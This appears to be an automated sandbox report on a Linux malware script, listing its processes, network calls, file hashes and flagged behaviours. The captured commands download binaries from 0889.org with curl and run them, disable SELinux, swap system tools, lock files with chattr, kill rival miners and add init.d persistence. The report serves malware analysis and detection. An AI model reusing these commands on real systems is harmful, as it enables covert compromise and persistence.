/bin/ln
[ln -fs /etc/init.d/crontabs /etc/rc2.d/S90crontabs]
/bin/ln
[ln -fs /etc/init.d/crontabs /etc/rc3.d/S90crontabs]
/bin/ln
[ln -fs /etc/init.d/crontabs /etc/rc4.d/S90crontabs]
/bin/ln
[ln -fs /etc/init.d/crontabs /etc/rc5.d/S90crontabs]
/usr/bin/curl
[curl -fsSL http://0889.org/aegis/mcron-vip-1 -o /usr/local/sbin/mcron]
/bin/chmod
[chmod +x /usr/local/sbin/mcron]
/usr/bin/chattr
[chattr +ia /usr/local/sbin/mcron]
/usr/bin/dirname
[dirname /usr/bin/bsd-port/knerl]
/bin/mkdir
[mkdir -p /usr/bin/bsd-port]
/usr/bin/curl
[curl -fsSL http://0889.org/aegis/10000 -o /usr/bin/bsd-port/knerl]
/bin/chmod
[chmod +x /usr/bin/bsd-port/knerl]
/usr/bin/chattr
[chattr +ia /usr/bin/bsd-port/knerl]
/usr/bin/curl
[curl -fsSL http://0889.org/aegis/grub -o /etc/init.d/grub]
/bin/chmod
[chmod +x /etc/init.d/grub]
/usr/bin/chattr
[chattr +ia /etc/init.d/grub]
/usr/local/sbin/mcron
[/usr/local/sbin/mcron]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | 0889.org | udp |
| GB | 51.143.179.104:80 | 0889.org | tcp |
| US | 1.1.1.1:53 | 0889.org | udp |
| GB | 51.143.179.104:80 | 0889.org | tcp |
| US | 1.1.1.1:53 | 0889.org | udp |
| GB | 51.143.179.104:80 | 0889.org | tcp |
Files
/etc/seduED3iV
| MD5 | 8f111d100ea459f68d333d63a8ef2205 |
| SHA1 | 077ca9c46a964de67c0f7765745d5c6f9e2065c3 |
| SHA256 | 0e5c204385b21e15b031c83f37212bf5a4ee77b51762b7b54bd6ad973ebdf354 |
| SHA512 | d81767b47fb84aaf435f930356ded574ee9825ec710a2e7c26074860d8a385741d65572740137b6f9686c285a32e2951ca933393b266746988f1737aad059adb |
/etc/init.d/sedqUuL8d
| MD5 | 9b392bac8c24330ad47478a5038ead13 |
| SHA1 | 6c3050598d168c42dc688cecb77fe478211c3ab9 |
| SHA256 | d054fee005a1aa4363200512769a6aef7aad68fc4c9947b8f8c417615727f07f |
| SHA512 | 2a4da94b1f58ce1e3dab46a9e32417da710d9049028858cca0a0003305c38658f9bbe0b06ec04cdea26cab02fbd0a9fe44f36e277c087bdbf66763e6bc0f7462 |
/etc/init.d/sed7tinrF
| MD5 | ce2de503acc3de02f544571e89d4d717 |
| SHA1 | 5d767b14666d82389475868f153a38594acce7ae |
| SHA256 | 52da7743f31954a5fbe1c312dd4112a671fec9efaa1f9812926a8d97543ba0e2 |
| SHA512 | 2a0cd9e9cbfa7f5d6a4bfa66eef9200ab5fb12ea645496135a42afa5d2ccd5fb4ae36d306138f1ef2094a512f347bdcdd4780fbd19ade74156c9cd9dfea55440 |
/etc/init.d/sedMwLA8Q
| MD5 | 03975a59225fad7d7c28e133de85d249 |
| SHA1 | 6f72b3b528550f16a2109bc9d86004180d7d734f |
| SHA256 | 42be3e66d014a04eb1cbccd57b3a4ef2c92b268798e2322ec87582271b9fed65 |
| SHA512 | e5b4028bd0ad53b76328f5f124ca9e88b1fc42b3617004a06c0954843a4586fb972763008bb96bd681003e5869952fc2678b65e7e5a5892f95efc618633f006e |
/etc/init.d/sedvbNyP4
| MD5 | 510488b5120b580b673a15b75a5498b0 |
| SHA1 | 0f667545ae788ae46ccc7045dc7975f044a76fd2 |
| SHA256 | a4fecda40d06d41cab9892b8c2832d3f41d333d944a91a9bc7334540d1cada26 |
| SHA512 | 3fdcaea110abc6d7be70f52341ff7f523de70afa571ccdc88cdf6e1fab264cae2f70fa2cd8be0ccaa9de0cae2db9baa6139fb951f78e50a78a7ac1d7afb06821 |
/etc/init.d/sed0q5Utk
| MD5 | 85d7a3783889ea93dcda2fb488420c1c |
| SHA1 | 8edf95b211ad7e8df3ee2a331c4e658e9b746e5c |
| SHA256 | 2df15277374dedbff7fb792f22e42a72c75fbfc73414ccc87e07f49d377ad9d0 |
| SHA512 | 9abf28183e952b372423ec48c3b20cd218cfd76b50138ced0dd1969f7be66e0697cbcaee28d71984c46369ea14f9a62a8061ee992ddc2ca2b186c87b689dc3e9 |
/etc/init.d/sed88r4Bk
| MD5 | ec9a7d183ec50837a12aca3f9c95cc27 |
| SHA1 | 396a23fa1d6e8a871d69786d14fd1ce4e4cba583 |
| SHA256 | c82a6b52fad02e7f7e33184a9b917fe966b20eb6afce27fb3b8c6e799f8df8a0 |
| SHA512 | ec1f384a5bc7e2a67b99838644346ea1391b5b75e7bcc1a1ea6d59f07418da7553175c8f43869ff352c0b7aa80cb26ccdc5f42c3dde9029917cebc520a19e85b |
/etc/init.d/sedvdRSWB
| MD5 | 0eb380bbeb5db57a59e298a074f1f9f3 |
| SHA1 | 284b88849b3dfd7f6c02c0d05c77a01292c8a679 |
| SHA256 | f1f205d18385e658de4d572d6df84a6ca125895fac42206443bc2b1118b2a6a2 |
| SHA512 | 428edfbdafa0ee634482ec597ce24cc96f92fcc308016bf3e4bf393711ae028a55c2d656bbfbaddec945a4ba7de17401dba2e432ed7593cbdab97e9de61b4e88 |
/etc/init.d/sed2KPZCO
| MD5 | 1ca5c0743fa797ffa364db95bb8d8d8e |
| SHA1 | 6de496930dfe00e705fa244d77e7dfa2d1c6aef8 |
| SHA256 | a919f9434b681974a2f1d4120af10c0527b30e8cda6fdec1dea1eee3077b6609 |
| SHA512 | 044c6136b2085066e71f15a942b341c54fcfe97f754a10d6e91971c150214e9be014cb96e83d8ae4dee51129f5b44a41c663598f9430e9c4cc93f5675b625b5f |
/etc/init.d/sedx1ab42
| MD5 | b868200c6e36ef87e27ead9a3ddad2db |
| SHA1 | b1cc85e63d4302b020a4679971b6c363c9392d63 |
| SHA256 | 5895801d6256ce6c2a65760e01db8ffd8b90a9bf80294e9a358423b3d4ce59d1 |
| SHA512 | f3dba21b0bb340c4742e5facd042180d66541010cc25f00e223cf545a78550184571951f5ac6c7c35a3840d08a6a07f89e78316c9f7cb65108c0558c3a5e9d0a |
/etc/init.d/sed2x3uAc
| MD5 | 82698019c962069b438bd2a82d9fa1e7 |
| SHA1 | 2ad758cc8614f4c8368e8e7eb71b92f0ff2e8305 |
| SHA256 | 65044cf080c0edd9bd6ba75e1a8e8d0f300930d590257c6d6ce28273899ad4a7 |
| SHA512 | dd64cd1f33f2cf09867363234e6791a3ebc3697aaef0d659e8e354c52fa9c4fc1c013369b28a42a831552eb888e2635e9a5d77c6619691af097c9fd2e4f0e9a9 |
/etc/init.d/sedwN5x5f
| MD5 | 27013efdfe13470845c70a9e00a61fde |
| SHA1 | 2b840ac1a1d1b866ba457bd0746144c431e944ad |
| SHA256 | c02921f45d52f6e5f324cc2cdd3cb9a00198a5b5e979cc501b16eec6a786e7f0 |
| SHA512 | 0fd9e4da5dc1702970cc7b05fff801784ddeebb772f0f3b49b2e034a4927eabef1d5864345687d16388a1d59b71e7b4628978dcbdf113577413130a73d181b1d |
/etc/init.d/sedv6RR3s
| MD5 | 49fbfd237be2a2f09576f1f9374580be |
| SHA1 | e380716a856a90f5643ddd6f3655020fc2f603dd |
| SHA256 | 69219f70b7b70dacbce2f4a0fd9b2f7ac05623a285ae7abf1e798fdb72fac02e |
| SHA512 | b6f37481d2397b79fa47e23435626166c9857a78d19b755703e867b7401fa066122d898b4d303c6629d154bd1ed19f486146878ff5fafbe1e020e821c4835cea |
/etc/init.d/sedoUuasG
| MD5 | 08213cf202f2552298f62a007487e01c |
| SHA1 | 1f143ee220797f30367d4de9e65ad9ac52fd8ea4 |
| SHA256 | 0f910b4518e553ac6b77c2942ee0ce753c96189550ee2b501293f7cc936edb5e |
| SHA512 | b3fb6f52c1345aec9d70fa60f8e3f69ad999307f1502cf80c2baac332c9ce6a5ec17c4e5b5759d47a5debb9f3ba913b188611a93bd82946538ed5a019d157c33 |
/etc/init.d/sedL7L6fV
| MD5 | 019ab1c1cb24b368b0965898746bb122 |
| SHA1 | 8146b37003a86a1348c6b165b32a247ce6907525 |
| SHA256 | deb397fc57b4e2a03e97e5a85889fba9af60aea6021ad1f0030149a81ea31818 |
| SHA512 | 9366e73bef488b09122ef763b942d258107464ecf6e5f32d70de0514fc3dc9baffb7e60b69bdf45b733f7521ed7b705989b7ac778089cf3958ef2eefe05f738a |
/etc/init.d/sedAnGcRa
| MD5 | 338975eb635877703fc066e005f916d9 |
| SHA1 | 5474296634bf9e527a9a865b0cb182e61a2b66bf |
| SHA256 | 89473464fed0e27fe2540620198293adbedac0c6a309dbca7a4bcf99996526f7 |
| SHA512 | 8ef00dc8893b2c7e3a988e4ffd5b60006591c424bb97c0cfbfe44cf76e94f742fcc7263e86b6608893c0e5cc9d04d28f2404a928a3a87bfb313a3caa4be808c8 |
/etc/init.d/sedas3nbc
| MD5 | 69497d0565055f626ee2bc84f818ce0f |
| SHA1 | b5ca73e0fef84a5aa8f0155f160952c4385045b8 |
| SHA256 | 5416ce07a0caf57f145d8f4f07e036d2decd72023e649f782d30be599ddf20da |
| SHA512 | 23d14d2c9f3356242a56f2716bd79d31f6c8a936c7a581d4b472ca126113a6b589f4ceb37816178b17ca09f508f196009ffcb390d349302a54dee0644f995bec |
/etc/init.d/sed3ewBKk
| MD5 | e4da2ae5c153148fad0b3f6e5e7ce61e |
| SHA1 | 3ef89c60b9f66bad7834dc5621772d474e3e36d9 |
| SHA256 | 373a932050d1fd4912c80fff5b941e49d37bf9899d156b524c6404f1c76e3923 |
| SHA512 | dff5193df49f6e639d76f38d0a45cd68efec5e6d4ee06801d732cdb1e3ca7057820be046fba05e13d07d934f248773df246760b6288b9753abe067f268d7cc10 |
/etc/init.d/sedkajU1t
| MD5 | 4bf46072f9f13b2e38d58a053def37d5 |
| SHA1 | 94e4b56f7a5d40a40f256a474e244642ad778a4e |
| SHA256 | a6ef18d6a1b3f33cb3df0dce41759bda88e3133d249e6c13848fb0a007654cbf |
| SHA512 | 0ffe565c26cf1585a0d26f47328fca2d886fc33b43537f4674d0f13d6eee3f39775fa0115e8b3606148665807540244e517d7c10130c161e7191172a76a031de |
/tmp/sh-thd.y06k78
| MD5 | 2ff9930962f5ed39a68bfabddc3551ac |
| SHA1 | 9f99fbefee4a609f403025ed510c2fa93982303b |
| SHA256 | d00546c6e26a2f1e7c7ae24a5173fb58b3d7e060d4920b7a7ba772bc76e956f7 |
| SHA512 | 6b6cd3c027e2b1b3b19519a413b96f15d4dc5579f30b61919e1ab7f2e1273141dec54d8b21cf49a8b89815d3cd9694354788a13ec651e0479eb70a53f576d1df |
/etc/init.d/crontabs
| MD5 | f21f5717d956b60f695d350bbab05716 |
| SHA1 | 1155f2cf27dc56f0e981ab78517dbf6d1b45d72f |
| SHA256 | c19b0543ff2a66484d54268c27defcd2a8d5b9ac26e267c73dace034ac21931e |
| SHA512 | 2bdf31983a48991dc7de0c2d25cb97a032fc6fd29fe1534536b9e910504a6d1317d83c935ad92bab979065da81f4f2c6218b7d2f5df31ffcc8190952a49e9ba2 |
/usr/local/sbin/mcron
| MD5 | 7cd0552f2eb740d23790d82134d0adb8 |
| SHA1 | c600bdcf3ba70156856b6712070a3c65368e2e62 |
| SHA256 | 62b44a654916d6e52af20897cbcf39e4134b4c79d2498fbbc08987cc392b5788 |
| SHA512 | 43309fdf0e4c2a1a7503488bd0493ebd1cb66cecf2fdf19dd76be9848a80be1478fcc0662c382ad8230ecf4963d89b8c1d58c33670db8777d136ae089517e9a7 |
/usr/bin/bsd-port/knerl
| MD5 | 8a51a05df6f69f2a6fc4c4e376b65f70 |
| SHA1 | 1b68e2894d97363dcd9f2d7e42724dfc58e0a260 |
| SHA256 | 7f048a07a9c6166054ae0a1fe9af0c38769ff6fc5189ada4e4144c71e5d24994 |
| SHA512 | 505595aeeae9018dc0d31e158899d620ef4fe1d9d8e510ee10a82aec889202e4994a3e387f628033a90aa53d633c1e7c7865a98cfdfb147ecc950b3c1376a37d |
/etc/init.d/grub
| MD5 | 81bb3911dc14f3eb53d0700a4aa50475 |
| SHA1 | 89531a3a74e100f51118a6c12d7a4e8d346eeac4 |
| SHA256 | 8027b789feb011489894fbac26a9d3e4ecc60972d85c5df7438c3dc390fc1962 |
| SHA512 | 632e4fc0d9be24c69faa8fd0e702f25a6530698908401cc868d2c294c83703b99c1378196b1b4456bc6e1d1bf364960e18427e92509d6c5bb94b4cb4d7e78995 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-11-13 23:20
Reported
2024-11-13 23:23
Platform
debian9-mipsel-20240418-en
Max time kernel
20s
Max time network
22s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /usr/local/sbin/mcron | /usr/local/sbin/mcron | N/A |
Abuse Elevation Control Mechanism: Sudo and Sudo Caching
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/sed | N/A |
Attempts to change immutable files
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /bin/sed | N/A |
| N/A | N/A | /bin/sed | N/A |
| N/A | N/A | /bin/sed | N/A |
| N/A | N/A | /bin/sed | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /bin/sed | N/A |
| N/A | N/A | /bin/sed | N/A |
| N/A | N/A | /bin/sed | N/A |
| N/A | N/A | /bin/sed | N/A |
| N/A | N/A | /bin/sed | N/A |
| N/A | N/A | /bin/sed | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /bin/sed | N/A |
| N/A | N/A | /bin/sed | N/A |
| N/A | N/A | /bin/sed | N/A |
| N/A | N/A | /bin/sed | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /bin/sed | N/A |
| N/A | N/A | /bin/sed | N/A |
| N/A | N/A | /bin/sed | N/A |
| N/A | N/A | /bin/sed | N/A |
| N/A | N/A | /bin/sed | N/A |
Disables SELinux
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/sbin/setenforce | N/A |
Enumerates running processes
Modifies init.d
| Description | Indicator | Process | Target |
| File opened for modification | /etc/init.d/sedcFdtji | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sedUWKnOM | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sedecL8Uf | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sedlS4UXu | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sed894o2H | /bin/sed | N/A |
| File opened for modification | /etc/init.d/selinux | /tmp/HMtWYpJGZVUZkrQK.sh | N/A |
| File opened for modification | /etc/init.d/sedDJH83P | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sed2doE35 | /bin/sed | N/A |
| File opened for modification | /etc/init.d/crontabs | /tmp/HMtWYpJGZVUZkrQK.sh | N/A |
| File opened for modification | /etc/init.d/sedUppmtj | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sedaOm0nf | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sedm74Teg | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sed7blsk4 | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sedmurBwi | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sedpQr9ow | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sedFiM310 | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sedlZSDfw | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sed0t4SpK | /bin/sed | N/A |
| File opened for modification | /etc/init.d/grub | /usr/bin/curl | N/A |
| File opened for modification | /etc/init.d/sedTtUAO1 | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sedmnWxVv | /bin/sed | N/A |
Write file to user bin folder
| Description | Indicator | Process | Target |
| File opened for modification | /usr/local/sbin/mcron | /usr/bin/curl | N/A |
| File opened for modification | /usr/bin/bsd-port/knerl | /usr/bin/curl | N/A |
Reads CPU attributes
| Description | Indicator | Process | Target |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/pkill | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/pkill | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/pkill | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/pkill | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/pkill | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/pkill | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/pkill | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/pkill | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/pkill | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/pkill | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/pkill | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/pkill | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/pkill | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/pkill | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/pkill | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/pkill | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/76/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/17/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/684/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/5/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/117/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/pkill | N/A |
| File opened for reading | /proc/691/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/73/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/117/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/798/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/81/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/377/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/350/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/692/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/22/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/19/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/691/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/349/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/14/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/18/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/695/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/149/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/660/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/71/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/74/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/37/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/17/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/22/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/145/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/145/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/filesystems | /bin/sed | N/A |
| File opened for reading | /proc/24/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/15/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/392/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/10/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/75/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/3/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/695/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/8/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/669/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/323/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/77/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/237/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/3/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/4/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/6/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/702/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/74/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/5/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/782/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/237/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/685/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/73/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/684/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/21/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/378/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/pkill | N/A |
| File opened for reading | /proc/374/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/75/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/694/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/73/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/151/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/24/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/24/status | /usr/bin/pkill | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/sh-thd.9HUJKD | /tmp/HMtWYpJGZVUZkrQK.sh | N/A |
| File opened for modification | /tmp/sh-thd.fSh6CI | /tmp/HMtWYpJGZVUZkrQK.sh | N/A |
Processes
/tmp/HMtWYpJGZVUZkrQK.sh
[/tmp/HMtWYpJGZVUZkrQK.sh]
/usr/sbin/setenforce
[setenforce 0]
/usr/bin/find
[find / -maxdepth 1 -name *.mod]
/usr/bin/chattr
[chattr -ia /bin/ps]
/usr/bin/chattr
[chattr -ia /usr/bin]
/usr/bin/chattr
[chattr -ia /etc/crontab]
/bin/cp
[cp -f /usr/bin/dpkgd/ps /usr/bin/ps]
/bin/cp
[cp -f /usr/bin/dpkgd/netstat /usr/bin/netstat]
/bin/cp
[cp -f /usr/bin/dpkgd/lsof /usr/bin/lsof]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/crontab]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/alsa-utils]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/atd]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/auditd]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/console-setup.sh]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/cron]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/dbus]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/exim4]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/hwclock.sh]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/keyboard-setup.sh]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/kmod]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/networking]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/procps]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/rsyslog]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/selinux-autorelabel]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/ssh]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/sudo]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/udev]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/x11-common]
/bin/mount
[mount]
/bin/grep
[grep -o /proc/[0-9]\+]
/usr/bin/sort
[sort -u]
/usr/bin/find
[find /etc/rc1.d/ -name *selinux* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc1.d/ -name *VsystemsshMdt* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc1.d/ -name *crontabs* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc1.d/ -name *dns-udp4* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc2.d/ -name *selinux* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc2.d/ -name *VsystemsshMdt* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc2.d/ -name *crontabs* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc2.d/ -name *dns-udp4* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc3.d/ -name *selinux* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc3.d/ -name *VsystemsshMdt* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc3.d/ -name *crontabs* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc3.d/ -name *dns-udp4* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc4.d/ -name *selinux* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc4.d/ -name *VsystemsshMdt* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc4.d/ -name *crontabs* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc4.d/ -name *dns-udp4* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc5.d/ -name *selinux* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc5.d/ -name *VsystemsshMdt* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc5.d/ -name *crontabs* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc5.d/ -name *dns-udp4* -exec rm -f {} +]
/usr/bin/pkill
[pkill awk]
/usr/bin/pkill
[pkill gurb]
/usr/bin/pkill
[pkill pythno]
/usr/bin/pkill
[pkill pythno3]
/usr/bin/pkill
[pkill pythno3.1]
/usr/bin/pkill
[pkill knerl]
/usr/bin/pkill
[pkill system.mark]
/usr/bin/pkill
[pkill system.pub]
/usr/bin/pkill
[pkill netstat.cfg]
/usr/bin/pkill
[pkill bash.cfg]
/usr/bin/pkill
[pkill libgdi.so.0.8.2]
/usr/bin/pkill
[pkill kernel]
/usr/bin/pkill
[pkill linkid]
/usr/bin/pkill
[pkill mcron]
/usr/bin/pkill
[pkill xmrig]
/usr/bin/pkill
[pkill initd]
/bin/cat
[cat]
/bin/cat
[cat]
/bin/chmod
[chmod 755 /etc/init.d/selinux /etc/init.d/crontabs]
/usr/bin/chattr
[chattr +ia /etc/init.d/selinux /etc/init.d/crontabs]
/bin/mkdir
[mkdir -p /usr/bin/bsd-port /usr/local/sbin]
/bin/ln
[ln -fs /etc/init.d/selinux /etc/rc2.d/S99selinux]
/bin/ln
[ln -fs /etc/init.d/selinux /etc/rc3.d/S99selinux]
/bin/ln
[ln -fs /etc/init.d/selinux /etc/rc4.d/S99selinux]
/bin/ln
[ln -fs /etc/init.d/selinux /etc/rc5.d/S99selinux]
/bin/ln
[ln -fs /etc/init.d/crontabs /etc/rc2.d/S90crontabs]
/bin/ln
[ln -fs /etc/init.d/crontabs /etc/rc3.d/S90crontabs]
